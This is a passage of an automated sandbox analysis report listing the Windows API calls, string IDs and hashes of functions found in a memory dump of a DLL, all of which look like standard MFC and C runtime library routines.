                                        • Instruction Fuzzy Hash: 1B516B70C052789ACB60DFA5DD887ADBAF4EF58314F2001EAA458E7280D7799F81CF55
                                        APIs
                                        • GetModuleHandleW.KERNEL32(USER32,00000000,00000000,75A44A40,6FEADE36,?,?,?,?,?,?,?,6FEAFCC6,00000000,00000002,00000028), ref: 6FEADCF9
                                        • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 6FEADD15
                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6FEADD2A
                                        • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 6FEADD3B
                                        • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 6FEADD4C
                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 6FEADD5D
                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 6FEADD6E
                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 6FEADD8E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                        • API String ID: 667068680-2451437823
                                        • Opcode ID: 9a85d461f9650e3fecc8fe1674a3b8d0fc46db8ac2523a8a6d80fc71f1fd1dc2
                                        • Instruction ID: 389fa42ee7792c6d99dc1b3f0e8da816f525c55e2519957d0815ee057f55effa
                                        • Opcode Fuzzy Hash: 9a85d461f9650e3fecc8fe1674a3b8d0fc46db8ac2523a8a6d80fc71f1fd1dc2
                                        • Instruction Fuzzy Hash: 012192758149619FCF106F74ADC44AE7EE6B7AB2293346A3FE421DB628C3711061CF11
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6FEB19B8
                                          • Part of subcall function 6FEAC050: __EH_prolog3.LIBCMT ref: 6FEAC057
                                        • CallNextHookEx.USER32(?,?,?,?), ref: 6FEB19F8
                                          • Part of subcall function 6FEA6DC1: __CxxThrowException@8.LIBCMT ref: 6FEA6DD7
                                          • Part of subcall function 6FEA6DC1: __EH_prolog3.LIBCMT ref: 6FEA6DE4
                                        • _memset.LIBCMT ref: 6FEB1A51
                                        • GetClassLongW.USER32(?,000000E0), ref: 6FEB1A85
                                        • SetWindowLongW.USER32(?,000000FC,Function_00010D95), ref: 6FEB1ADA
                                        • GetClassNameW.USER32(?,?,00000100), ref: 6FEB1B20
                                        • GetWindowLongW.USER32(?,000000FC), ref: 6FEB1B46
                                        • GetPropW.USER32(?,AfxOldWndProc423), ref: 6FEB1B5D
                                        • SetPropW.USER32(?,AfxOldWndProc423,?), ref: 6FEB1B6F
                                        • GetPropW.USER32(?,AfxOldWndProc423), ref: 6FEB1B77
                                        • GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 6FEB1B86
                                        • SetWindowLongW.USER32(?,000000FC,Function_00011861), ref: 6FEB1B94
                                        • CallNextHookEx.USER32(?,00000003,?,?), ref: 6FEB1BA6
                                        • UnhookWindowsHookEx.USER32(?), ref: 6FEB1BBA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Long$HookPropWindow$CallClassH_prolog3Next$AtomException@8GlobalH_prolog3_NameThrowUnhookWindows_memset
                                        • String ID: #32768$AfxOldWndProc423
                                        • API String ID: 4265692241-2141921550
                                        • Opcode ID: 4e159c78afb3440dc1278f29f5eb79d4e204c93c39eb0df401f17da9c6f7bfc6
                                        • Instruction ID: 90be0957f5cc7c67f8363c19d0dec2cd88f501c531c63c597f2a0c37f4810c1c
                                        • Opcode Fuzzy Hash: 4e159c78afb3440dc1278f29f5eb79d4e204c93c39eb0df401f17da9c6f7bfc6
                                        • Instruction Fuzzy Hash: 1351C531544725EBCB119F64CE88B9A7FB8BF06375F201199F4199A290DB349A91CBA0
                                        APIs
                                          • Part of subcall function 6FEB2C57: GetWindowLongW.USER32(?,000000F0), ref: 6FEB2C62
                                        • GetParent.USER32(?), ref: 6FEAFC05
                                        • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6FEAFC28
                                        • GetWindowRect.USER32(?,?), ref: 6FEAFC42
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 6FEAFC58
                                        • CopyRect.USER32(?,?), ref: 6FEAFCA5
                                        • CopyRect.USER32(?,?), ref: 6FEAFCAF
                                        • GetWindowRect.USER32(00000000,?), ref: 6FEAFCB8
                                          • Part of subcall function 6FEADE96: MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FEADED6
                                        • CopyRect.USER32(?,?), ref: 6FEAFCD4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Rect$Window$Copy$Long$ByteCharMessageMultiParentSendWide
                                        • String ID: (
                                        • API String ID: 1385303425-3887548279
                                        • Opcode ID: d92075ae5697d6456c64d6ca52296a08ae94226b5ecf7d5161a3f5f657bb0acb
                                        • Instruction ID: 7e73fe4bed88a67a9076ca821bf3dfeb3e2229b926424ccaae3f8ef0a257ceac
                                        • Opcode Fuzzy Hash: d92075ae5697d6456c64d6ca52296a08ae94226b5ecf7d5161a3f5f657bb0acb
                                        • Instruction Fuzzy Hash: A5516172904619ABDB01CBA8CD84AEEBFB9AF49314F254159F915F7280DB34E901CB94
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6FECE928,0000000C,6FEBA25A,00000000,00000000,?,6FEBA5D4,00000000,00000001,00000000,?,6FEBA89E,00000018,6FECE978,0000000C), ref: 6FEBA131
                                        • __crt_waiting_on_module_handle.LIBCMT ref: 6FEBA13C
                                          • Part of subcall function 6FEB5BCF: Sleep.KERNEL32(000003E8,00000000,?,6FEBA082,KERNEL32.DLL,?,?,6FEBA416,00000000,?,6FEB488C,00000000,?,?,?,6FEB48EF), ref: 6FEB5BDB
                                          • Part of subcall function 6FEB5BCF: GetModuleHandleW.KERNEL32(00000000,?,6FEBA082,KERNEL32.DLL,?,?,6FEBA416,00000000,?,6FEB488C,00000000,?,?,?,6FEB48EF,?), ref: 6FEB5BE4
                                        • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 6FEBA165
                                        • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 6FEBA175
                                        • __lock.LIBCMT ref: 6FEBA197
                                        • InterlockedIncrement.KERNEL32(?), ref: 6FEBA1A4
                                        • __lock.LIBCMT ref: 6FEBA1B8
                                        • ___addlocaleref.LIBCMT ref: 6FEBA1D6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                        • String ID: $o$DecodePointer$EncodePointer$KERNEL32.DLL
                                        • API String ID: 1028249917-3531221583
                                        • Opcode ID: a388a804b03c0d35749bb687af5477c187832f4cee6762adf18c3d3edb0ac831
                                        • Instruction ID: 3267278096454d0e1c507f909eb579db5471ad66fdd251f67e4aad319ced42f7
                                        • Opcode Fuzzy Hash: a388a804b03c0d35749bb687af5477c187832f4cee6762adf18c3d3edb0ac831
                                        • Instruction Fuzzy Hash: BD11B4B0844B019FDB508F79CA00B5EBFE0AF45728F30855EE8AA97390CB34AA40CF55
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32), ref: 6FEA8503
                                        • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FEA8520
                                        • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 6FEA852D
                                        • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 6FEA853A
                                        • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 6FEA8547
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                        • API String ID: 667068680-2424895508
                                        • Opcode ID: 548eabe8984a07c2540f57b586cc671e069445f8f22ba545c804ec554d57449d
                                        • Instruction ID: d5913e3a6b7ba1ee850af37894cf194872838851b6df704bfd3e98bd16abf267
                                        • Opcode Fuzzy Hash: 548eabe8984a07c2540f57b586cc671e069445f8f22ba545c804ec554d57449d
                                        • Instruction Fuzzy Hash: 95117BB1C0D691AFCF10EFA59989446BFB5AB87339325043FF5198B710D7315650CB22
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32,6FEAA6B6), ref: 6FEAA5AA
                                        • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FEAA5CB
                                        • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FEAA5DD
                                        • GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FEAA5EF
                                        • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FEAA601
                                          • Part of subcall function 6FEA6DC1: __CxxThrowException@8.LIBCMT ref: 6FEA6DD7
                                          • Part of subcall function 6FEA6DC1: __EH_prolog3.LIBCMT ref: 6FEA6DE4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                                        • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                        • API String ID: 417325364-2424895508
                                        • Opcode ID: 3b6cabdf337741ddb7b1d40d4fa33ce2255d5c84f6e0fb5c67bcafe9051e47b1
                                        • Instruction ID: eefc99a7ea94dd21f033c97851439fb59b5085b7bd279d9509f788ddeca3fa24
                                        • Opcode Fuzzy Hash: 3b6cabdf337741ddb7b1d40d4fa33ce2255d5c84f6e0fb5c67bcafe9051e47b1
                                        • Instruction Fuzzy Hash: 76F01C70C0DB35AFCF415FB5AE099067FACAB87379710442BB81492614D7718528CF42
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: __wcsdup$ExtensionFileFindModuleNamePath
                                        • String ID: .CHM$.HLP$.INI
                                        • API String ID: 2477486372-4017452060
                                        • Opcode ID: 3fe38ddd3d60e2ffa3c569d1c8520ff6087cb0518042381aeac53ba00f1fb0c2
                                        • Instruction ID: 8b30e3de6475e77c80a3b8ceb5c69e7ebb1b6d69350b12fd41d8a942ea61187f
                                        • Opcode Fuzzy Hash: 3fe38ddd3d60e2ffa3c569d1c8520ff6087cb0518042381aeac53ba00f1fb0c2
                                        • Instruction Fuzzy Hash: A341B3B1A007099FDB20DB78CD44A9ABFFDAF45308F2004AED556DB290EB32E944CB51
                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6FEB1868
                                        • GetPropW.USER32(?,AfxOldWndProc423), ref: 6FEB1877
                                        • CallWindowProcW.USER32(?,?,00000110,?,00000000), ref: 6FEB18D1
                                          • Part of subcall function 6FEB0C2C: GetWindowRect.USER32(?,10000000), ref: 6FEB0C56
                                        • SetWindowLongW.USER32(?,000000FC,?), ref: 6FEB18F8
                                        • RemovePropW.USER32(?,AfxOldWndProc423), ref: 6FEB1900
                                        • GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 6FEB1907
                                        • GlobalDeleteAtom.KERNEL32(?), ref: 6FEB1911
                                        • CallWindowProcW.USER32(?,?,?,?,00000000), ref: 6FEB1965
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
                                        • String ID: AfxOldWndProc423
                                        • API String ID: 2109165785-1060338832
                                        • Opcode ID: ee1c639d9bcb67c4e9c20e7df5eeb46c7e6203eaf64ff2f77003962da44dfa8d
                                        • Instruction ID: 9379fa8b3ea69ae5fdb6b971fa72edc8d0bd3c5607d1d5ece064ae5a99a23c89
                                        • Opcode Fuzzy Hash: ee1c639d9bcb67c4e9c20e7df5eeb46c7e6203eaf64ff2f77003962da44dfa8d
                                        • Instruction Fuzzy Hash: 8F31703240425AABCF019FE4CF49DFF7E79AF46325F20052DF611A6190C7399A21DBA1
                                        APIs
                                        • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,6FEA1BE9,?,?,?,?), ref: 6FEA1C39
                                        • GetLastError.KERNEL32(?,?,?,?,?,6FEA1BE9,?,?,?,?), ref: 6FEA1C48
                                        • __aullrem.LIBCMT ref: 6FEA1C60
                                        • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000), ref: 6FEA1CE8
                                        • _memset.LIBCMT ref: 6FEA1CF5
                                        • SetFilePointer.KERNEL32(?,?,00000000,00000001,?,?,?,?,6FEA1BE9,?,?,?,?), ref: 6FEA1D07
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: File$Pointer$ErrorLastRead__aullrem_memset
                                        • String ID:
                                        • API String ID: 123228641-0
                                        • Opcode ID: 060229d79050c066b4d46301204deba53900ac6c9519900ffe4ca0bccc685925
                                        • Instruction ID: cab8c6122ae3524d3f3e078402c37b4c8d7eed7aa3cd2e524b549cf3a0999f64
                                        • Opcode Fuzzy Hash: 060229d79050c066b4d46301204deba53900ac6c9519900ffe4ca0bccc685925
                                        • Instruction Fuzzy Hash: 45516171608711AFD740DF69C844B9BBBE8EF88764F10492DF968DB340E775E9048BA2
                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6FEABE14
                                        • RtlEnterCriticalSection.NTDLL(00000000), ref: 6FEABE25
                                        • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,6FEAAF00,6FEA6DDD,6FEA68AD,?,6FEB4902,?,?,?,?), ref: 6FEABE43
                                        • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,6FEAAF00,6FEA6DDD,6FEA68AD,?,6FEB4902,?), ref: 6FEABE77
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 6FEABEE3
                                        • _memset.LIBCMT ref: 6FEABF02
                                        • TlsSetValue.KERNEL32(?,00000000), ref: 6FEABF13
                                        • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FEABF34
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                        • String ID:
                                        • API String ID: 1891723912-0
                                        • Opcode ID: 129a8ac89bedd4292fcec1cc816d15464437964e4656b3038e515300d03c6e12
                                        • Instruction ID: b816380d9123aa9b001354619aa4df0094a2b5dcfe49ec36d51b9cb81ba97d9c
                                        • Opcode Fuzzy Hash: 129a8ac89bedd4292fcec1cc816d15464437964e4656b3038e515300d03c6e12
                                        • Instruction Fuzzy Hash: F4315D74904609EFDB109F24CD8585ABFB5FF06324B30C52EE6659A694CB32A950CF90
                                        APIs
                                          • Part of subcall function 6FEA815A: GetParent.USER32(?), ref: 6FEA81AE
                                          • Part of subcall function 6FEA815A: GetLastActivePopup.USER32(?), ref: 6FEA81BF
                                          • Part of subcall function 6FEA815A: IsWindowEnabled.USER32(?), ref: 6FEA81D3
                                          • Part of subcall function 6FEA815A: EnableWindow.USER32(?,00000000), ref: 6FEA81E6
                                        • EnableWindow.USER32(?,00000001), ref: 6FEA8247
                                        • GetWindowThreadProcessId.USER32(?,?), ref: 6FEA825B
                                        • GetCurrentProcessId.KERNEL32(?,?), ref: 6FEA8265
                                        • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6FEA827D
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 6FEA82F9
                                        • EnableWindow.USER32(00000000,00000001), ref: 6FEA8340
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                        • String ID: 8mo
                                        • API String ID: 1877664794-4096906208
                                        • Opcode ID: 23bb819fb8e9190f62548e9bf88f8c7a43ca69fba5ce639331d2667d909be4f8
                                        • Instruction ID: 8887d69f6333ffd815ff1134b0a6f78cb8a48a6e41a2b0ae90d684a2b1038126
                                        • Opcode Fuzzy Hash: 23bb819fb8e9190f62548e9bf88f8c7a43ca69fba5ce639331d2667d909be4f8
                                        • Instruction Fuzzy Hash: 8F41D531A04B589BDB108F64CD887EA7FB4FF45314F200599E524DA284D771EF508BA0
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FEADED6
                                        • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 6FEADF00
                                        • GetSystemMetrics.USER32(00000000), ref: 6FEADF17
                                        • GetSystemMetrics.USER32(00000001), ref: 6FEADF1E
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,-00000028,00000020), ref: 6FEADF49
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: System$ByteCharMetricsMultiWide$InfoParameters
                                        • String ID: B$DISPLAY
                                        • API String ID: 381819527-3316187204
                                        • Opcode ID: 94594cb07485c052c64b05a55d4a5e490e7d6d3d10fbdd943818f4d6cff89b1f
                                        • Instruction ID: 170ee61b191453d6bac06a0a536f162f87df3fc88f71908c5668a9110b31e9fd
                                        • Opcode Fuzzy Hash: 94594cb07485c052c64b05a55d4a5e490e7d6d3d10fbdd943818f4d6cff89b1f
                                        • Instruction Fuzzy Hash: 2C21CB79504720ABDF208F248C44B5B7FAAFF46764F214176FD289F284D6B1D541CBA1
                                        APIs
                                        • GetSystemMetrics.USER32(0000000B), ref: 6FEACD75
                                        • GetSystemMetrics.USER32(0000000C), ref: 6FEACD7C
                                        • GetSystemMetrics.USER32(00000002), ref: 6FEACD83
                                        • GetSystemMetrics.USER32(00000003), ref: 6FEACD8D
                                        • GetDC.USER32(00000000), ref: 6FEACD97
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 6FEACDA8
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 6FEACDB0
                                        • ReleaseDC.USER32(00000000,00000000), ref: 6FEACDB8
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: MetricsSystem$CapsDevice$Release
                                        • String ID:
                                        • API String ID: 1151147025-0
                                        • Opcode ID: 5aac92f3e937b0023238ae7c9222d6a78d17832c2e582e0dffe35d658ac06a81
                                        • Instruction ID: eda123522eb1c6b13b8010e69af7d8cc25db66ebd35b625e496d2ba5d92b1987
                                        • Opcode Fuzzy Hash: 5aac92f3e937b0023238ae7c9222d6a78d17832c2e582e0dffe35d658ac06a81
                                        • Instruction Fuzzy Hash: 47F06DB1E40B28BAEB105B728C4AF167F68EB42731F004567F6148B2C0CAB598208FD0
                                        APIs
                                        • _memset.LIBCMT ref: 6FEB029B
                                        • SendMessageW.USER32(00000000,00000433,00000000,?), ref: 6FEB02C4
                                        • GetWindowLongW.USER32(?,000000FC), ref: 6FEB02D6
                                        • GetWindowLongW.USER32(?,000000FC), ref: 6FEB02E7
                                        • SetWindowLongW.USER32(?,000000FC,?), ref: 6FEB0303
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: LongWindow$MessageSend_memset
                                        • String ID: ,
                                        • API String ID: 2997958587-3772416878
                                        • Opcode ID: 9f725cb41df36a18098735d057b5a5b75cedfd6d59475dbe473dcdb0b24d72b6
                                        • Instruction ID: c342cf27d199718ab9e906dbb36ab5739fadda93d705402692abb0b4dbfb8d99
                                        • Opcode Fuzzy Hash: 9f725cb41df36a18098735d057b5a5b75cedfd6d59475dbe473dcdb0b24d72b6
                                        • Instruction Fuzzy Hash: 9631A0316007109FDB109FB8CA84A5DBFF5BF89328F20166DE6569B691EB31F404CB54
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6FEAA20A
                                        • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 6FEAA2F0
                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FEAA30D
                                        • RegCloseKey.ADVAPI32(?), ref: 6FEAA32D
                                        • RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 6FEAA348
                                        Strings
                                        Memory Dump Source
